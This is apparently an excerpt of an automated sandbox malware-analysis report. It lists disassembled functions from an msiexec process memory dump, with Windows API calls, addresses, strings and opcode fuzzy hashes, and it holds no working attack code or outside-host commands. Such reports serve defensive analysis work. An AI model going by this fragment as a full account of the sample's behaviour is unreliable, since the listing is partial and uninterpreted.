                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$CloseHandle
                                                                                              • String ID: General
                                                                                              • API String ID: 3722638380-26480598
                                                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                              APIs
                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                              • String ID:
                                                                                              • API String ID: 764393265-0
                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                              • String ID:
                                                                                              • API String ID: 979780441-0
                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                              • String ID:
                                                                                              • API String ID: 1386444988-0
                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateMessageRectSend
                                                                                              • String ID: d=E
                                                                                              • API String ID: 909852535-3703654223
                                                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcschr$memcpywcslen
                                                                                              • String ID: "
                                                                                              • API String ID: 1983396471-123907689
                                                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                              APIs
                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                              • String ID: URL
                                                                                              • API String ID: 2108176848-3574463123
                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                              APIs
                                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfmemcpy
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 2789212964-323797159
                                                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf
                                                                                              • String ID: %%-%d.%ds
                                                                                              • API String ID: 3988819677-2008345750
                                                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: F^@
                                                                                              • API String ID: 568519121-3652327722
                                                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PlacementWindowmemset
                                                                                              • String ID: WinPos
                                                                                              • API String ID: 4036792311-2823255486
                                                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@DeleteObject
                                                                                              • String ID: r!A
                                                                                              • API String ID: 1103273653-628097481
                                                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                              APIs
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 383090722-1948609170
                                                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                              • API String ID: 2773794195-880857682
                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                              APIs
                                                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                              • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                              • free.MSVCRT ref: 0040A908
                                                                                              • free.MSVCRT ref: 0040A92B
                                                                                              • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 726966127-0
                                                                                              • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                              • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                                              • free.MSVCRT ref: 0040B201
                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                              • free.MSVCRT ref: 0040B224
                                                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 726966127-0
                                                                                              • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                              • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                              APIs
                                                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 231171946-0
                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                              • free.MSVCRT ref: 0040B12C
                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3669619086-0
                                                                                              • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                              • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                              • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                              • free.MSVCRT ref: 00417425
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
